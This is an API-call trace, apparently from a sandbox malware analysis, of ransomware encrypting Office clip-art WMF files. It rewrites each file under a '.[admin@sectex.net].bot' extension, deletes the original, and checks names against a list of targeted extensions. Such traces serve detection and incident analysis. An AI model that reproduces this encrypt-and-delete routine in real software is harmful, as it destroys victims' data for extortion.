	[0149.253] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00046_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\in00046_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3dc
	[0149.253] GetLastError () returned 0x0
	[0149.253] ReadFile (in: hFile=0x3e4, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x486, lpOverlapped=0x0) returned 1
	[0149.269] WriteFile (in: hFile=0x3dc, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0x490, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0x490, lpOverlapped=0x0) returned 1
	[0149.270] ReadFile (in: hFile=0x3e4, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x0, lpOverlapped=0x0) returned 1
	[0149.270] WriteFile (in: hFile=0x3dc, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0xec, lpOverlapped=0x0) returned 1
	[0149.270] SetEndOfFile (hFile=0x3dc) returned 1
	[0149.271] CloseHandle (hObject=0x3dc) returned 1
	[0149.271] SetFilePointerEx (in: hFile=0x3e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0149.271] SetEndOfFile (hFile=0x3e4) returned 1
	[0149.273] CloseHandle (hObject=0x3e4) returned 1
	[0149.273] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00046_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0149.273] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00046_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\in00046_.wmf")) returned 1
	[0149.273] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00046_.WMF") returned 63
	[0149.274] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00046_.WMF") returned 63
	[0149.274] lstrlenW (lpString=".doc") returned 4
	[0149.274] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0149.274] lstrlenW (lpString=".docx") returned 5
	[0149.274] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0149.274] lstrlenW (lpString=".pdf") returned 4
	[0149.274] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0149.274] lstrlenW (lpString=".xls") returned 4
	[0149.274] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0149.274] lstrlenW (lpString=".xlsx") returned 5
	[0149.274] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0149.274] lstrlenW (lpString=".ppt") returned 4
	[0149.274] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0149.274] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00046_.WMF") returned 63
	[0149.274] lstrlenW (lpString=".zip") returned 4
	[0149.274] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0149.274] lstrlenW (lpString=".rar") returned 4
	[0149.274] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0149.274] lstrlenW (lpString=".bz2") returned 4
	[0149.274] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0149.274] lstrlenW (lpString=".7z") returned 3
	[0149.274] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0149.274] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00046_.WMF") returned 63
	[0149.274] lstrlenW (lpString=".dbf") returned 4
	[0149.274] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0149.274] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00046_.WMF") returned 63
	[0149.274] lstrlenW (lpString=".1cd") returned 4
	[0149.274] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0149.274] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00046_.WMF") returned 63
	[0149.274] lstrlenW (lpString=".jpg") returned 4
	[0149.274] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0149.274] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00046_.WMF") returned 63
	[0149.275] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00046_.WMF") returned 63
	[0149.275] lstrlenW (lpString=".doc") returned 4
	[0149.275] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0149.275] lstrlenW (lpString=".docx") returned 5
	[0149.275] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0149.275] lstrlenW (lpString=".pdf") returned 4
	[0149.275] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0149.275] lstrlenW (lpString=".xls") returned 4
	[0149.275] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0149.275] lstrlenW (lpString=".xlsx") returned 5
	[0149.275] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0149.275] lstrlenW (lpString=".ppt") returned 4
	[0149.275] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0149.275] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00046_.WMF") returned 63
	[0149.275] lstrlenW (lpString=".zip") returned 4
	[0149.275] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0149.275] lstrlenW (lpString=".rar") returned 4
	[0149.275] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0149.275] lstrlenW (lpString=".bz2") returned 4
	[0149.275] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0149.275] lstrlenW (lpString=".7z") returned 3
	[0149.275] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0149.275] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00046_.WMF") returned 63
	[0149.275] lstrlenW (lpString=".dbf") returned 4
	[0149.275] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0149.275] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00046_.WMF") returned 63
	[0149.275] lstrlenW (lpString=".1cd") returned 4
	[0149.275] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0149.275] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00046_.WMF") returned 63
	[0149.275] lstrlenW (lpString=".jpg") returned 4
	[0149.275] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0149.276] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0149.276] lstrlenW (lpString="IN00233_.WMF") returned 12
	[0149.276] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00233_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\in00233_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e4
	[0149.276] GetFileSizeEx (in: hFile=0x3e4, lpFileSize=0xa2cff1c | out: lpFileSize=0xa2cff1c*=11190) returned 1
	[0149.276] CloseHandle (hObject=0x3e4) returned 1
	[0149.276] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00233_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\in00233_.wmf")) returned 0x20
	[0149.276] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00233_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\in00233_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0149.277] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00233_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\in00233_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e4
	[0149.277] SetFilePointerEx (in: hFile=0x3e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0149.277] SetFilePointerEx (in: hFile=0x3e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0149.277] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00233_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\in00233_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3dc
	[0149.277] GetLastError () returned 0x0
	[0149.277] ReadFile (in: hFile=0x3e4, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x2bb6, lpOverlapped=0x0) returned 1
	[0149.457] WriteFile (in: hFile=0x3dc, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0x2bc0, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0x2bc0, lpOverlapped=0x0) returned 1
	[0149.458] ReadFile (in: hFile=0x3e4, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x0, lpOverlapped=0x0) returned 1
	[0149.459] WriteFile (in: hFile=0x3dc, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0xec, lpOverlapped=0x0) returned 1
	[0149.459] SetEndOfFile (hFile=0x3dc) returned 1
	[0149.459] CloseHandle (hObject=0x3dc) returned 1
	[0149.459] SetFilePointerEx (in: hFile=0x3e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0149.459] SetEndOfFile (hFile=0x3e4) returned 1
	[0149.461] CloseHandle (hObject=0x3e4) returned 1
	[0149.461] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00233_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0149.468] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00233_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\in00233_.wmf")) returned 1
	[0149.468] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00233_.WMF") returned 63
	[0149.468] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00233_.WMF") returned 63
	[0149.468] lstrlenW (lpString=".doc") returned 4
	[0149.468] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0149.468] lstrlenW (lpString=".docx") returned 5
	[0149.468] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0149.468] lstrlenW (lpString=".pdf") returned 4
	[0149.468] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0149.468] lstrlenW (lpString=".xls") returned 4
	[0149.469] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0149.469] lstrlenW (lpString=".xlsx") returned 5
	[0149.469] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0149.469] lstrlenW (lpString=".ppt") returned 4
	[0149.469] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0149.469] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00233_.WMF") returned 63
	[0149.469] lstrlenW (lpString=".zip") returned 4
	[0149.469] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0149.469] lstrlenW (lpString=".rar") returned 4
	[0149.469] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0149.469] lstrlenW (lpString=".bz2") returned 4
	[0149.469] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0149.469] lstrlenW (lpString=".7z") returned 3
	[0149.469] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0149.469] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00233_.WMF") returned 63
	[0149.469] lstrlenW (lpString=".dbf") returned 4
	[0149.469] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0149.469] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00233_.WMF") returned 63
	[0149.469] lstrlenW (lpString=".1cd") returned 4
	[0149.469] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0149.469] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00233_.WMF") returned 63
	[0149.469] lstrlenW (lpString=".jpg") returned 4
	[0149.469] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0149.469] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00233_.WMF") returned 63
	[0149.469] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00233_.WMF") returned 63
	[0149.469] lstrlenW (lpString=".doc") returned 4
	[0149.469] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0149.469] lstrlenW (lpString=".docx") returned 5
	[0149.469] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0149.470] lstrlenW (lpString=".pdf") returned 4
	[0149.470] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0149.470] lstrlenW (lpString=".xls") returned 4
	[0149.470] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0149.470] lstrlenW (lpString=".xlsx") returned 5
	[0149.470] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0149.470] lstrlenW (lpString=".ppt") returned 4
	[0149.470] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0149.470] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00233_.WMF") returned 63
	[0149.470] lstrlenW (lpString=".zip") returned 4
	[0149.470] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0149.470] lstrlenW (lpString=".rar") returned 4
	[0149.470] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0149.470] lstrlenW (lpString=".bz2") returned 4
	[0149.470] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0149.470] lstrlenW (lpString=".7z") returned 3
	[0149.470] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0149.470] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00233_.WMF") returned 63
	[0149.470] lstrlenW (lpString=".dbf") returned 4
	[0149.470] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0149.470] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00233_.WMF") returned 63
	[0149.470] lstrlenW (lpString=".1cd") returned 4
	[0149.470] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0149.470] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00233_.WMF") returned 63
	[0149.470] lstrlenW (lpString=".jpg") returned 4
	[0149.470] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0149.470] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0149.470] lstrlenW (lpString="IN00351_.WMF") returned 12
	[0149.471] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00351_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\in00351_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f4
	[0149.471] GetFileSizeEx (in: hFile=0x3f4, lpFileSize=0xa2cff1c | out: lpFileSize=0xa2cff1c*=1928) returned 1
	[0149.471] CloseHandle (hObject=0x3f4) returned 1
	[0149.471] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00351_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\in00351_.wmf")) returned 0x20
	[0149.472] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00351_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\in00351_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0149.472] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00351_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\in00351_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f4
	[0149.472] SetFilePointerEx (in: hFile=0x3f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0149.472] SetFilePointerEx (in: hFile=0x3f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0149.472] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00351_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\in00351_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e4
	[0149.472] GetLastError () returned 0x0
	[0149.473] ReadFile (in: hFile=0x3f4, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x788, lpOverlapped=0x0) returned 1
	[0149.542] WriteFile (in: hFile=0x3e4, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0x790, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0x790, lpOverlapped=0x0) returned 1
	[0149.543] ReadFile (in: hFile=0x3f4, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x0, lpOverlapped=0x0) returned 1
	[0149.543] WriteFile (in: hFile=0x3e4, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0xec, lpOverlapped=0x0) returned 1
	[0149.543] SetEndOfFile (hFile=0x3e4) returned 1
	[0149.545] CloseHandle (hObject=0x3e4) returned 1
	[0149.545] SetFilePointerEx (in: hFile=0x3f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0149.545] SetEndOfFile (hFile=0x3f4) returned 1
	[0149.547] CloseHandle (hObject=0x3f4) returned 1
	[0149.547] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00351_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0149.548] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00351_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\in00351_.wmf")) returned 1
	[0149.549] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00351_.WMF") returned 63
	[0149.549] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00351_.WMF") returned 63
	[0149.549] lstrlenW (lpString=".doc") returned 4
	[0149.549] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0149.549] lstrlenW (lpString=".docx") returned 5
	[0149.549] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0149.549] lstrlenW (lpString=".pdf") returned 4
	[0149.549] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0149.549] lstrlenW (lpString=".xls") returned 4
	[0149.549] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0149.549] lstrlenW (lpString=".xlsx") returned 5
	[0149.549] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0149.549] lstrlenW (lpString=".ppt") returned 4
	[0149.549] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0149.549] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00351_.WMF") returned 63
	[0149.549] lstrlenW (lpString=".zip") returned 4
	[0149.549] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0149.550] lstrlenW (lpString=".rar") returned 4
	[0149.550] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0149.550] lstrlenW (lpString=".bz2") returned 4
	[0149.550] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0149.550] lstrlenW (lpString=".7z") returned 3
	[0149.550] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0149.550] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00351_.WMF") returned 63
	[0149.550] lstrlenW (lpString=".dbf") returned 4
	[0149.550] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0149.550] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00351_.WMF") returned 63
	[0149.550] lstrlenW (lpString=".1cd") returned 4
	[0149.550] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0149.550] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00351_.WMF") returned 63
	[0149.550] lstrlenW (lpString=".jpg") returned 4
	[0149.550] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0149.550] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00351_.WMF") returned 63
	[0149.550] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00351_.WMF") returned 63
	[0149.550] lstrlenW (lpString=".doc") returned 4
	[0149.550] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0149.550] lstrlenW (lpString=".docx") returned 5
	[0149.550] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0149.550] lstrlenW (lpString=".pdf") returned 4
	[0149.550] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0149.550] lstrlenW (lpString=".xls") returned 4
	[0149.550] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0149.550] lstrlenW (lpString=".xlsx") returned 5
	[0149.550] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0149.550] lstrlenW (lpString=".ppt") returned 4
	[0149.550] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0149.550] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00351_.WMF") returned 63
	[0149.550] lstrlenW (lpString=".zip") returned 4
	[0149.551] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0149.551] lstrlenW (lpString=".rar") returned 4
	[0149.551] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0149.551] lstrlenW (lpString=".bz2") returned 4
	[0149.551] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0149.551] lstrlenW (lpString=".7z") returned 3
	[0149.551] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0149.551] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00351_.WMF") returned 63
	[0149.551] lstrlenW (lpString=".dbf") returned 4
	[0149.551] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0149.551] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00351_.WMF") returned 63
	[0149.551] lstrlenW (lpString=".1cd") returned 4
	[0149.551] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0149.551] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00351_.WMF") returned 63
	[0149.551] lstrlenW (lpString=".jpg") returned 4
	[0149.551] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0149.551] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0149.551] lstrlenW (lpString="IN00919_.WMF") returned 12
	[0149.551] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00919_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\in00919_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3dc
	[0149.677] GetFileSizeEx (in: hFile=0x3dc, lpFileSize=0xa2cff1c | out: lpFileSize=0xa2cff1c*=6920) returned 1
	[0149.677] CloseHandle (hObject=0x3dc) returned 1
	[0149.677] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00919_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\in00919_.wmf")) returned 0x20
	[0149.820] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00919_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\in00919_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0149.976] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00919_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\in00919_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e8
	[0149.981] SetFilePointerEx (in: hFile=0x3e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0149.981] SetFilePointerEx (in: hFile=0x3e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
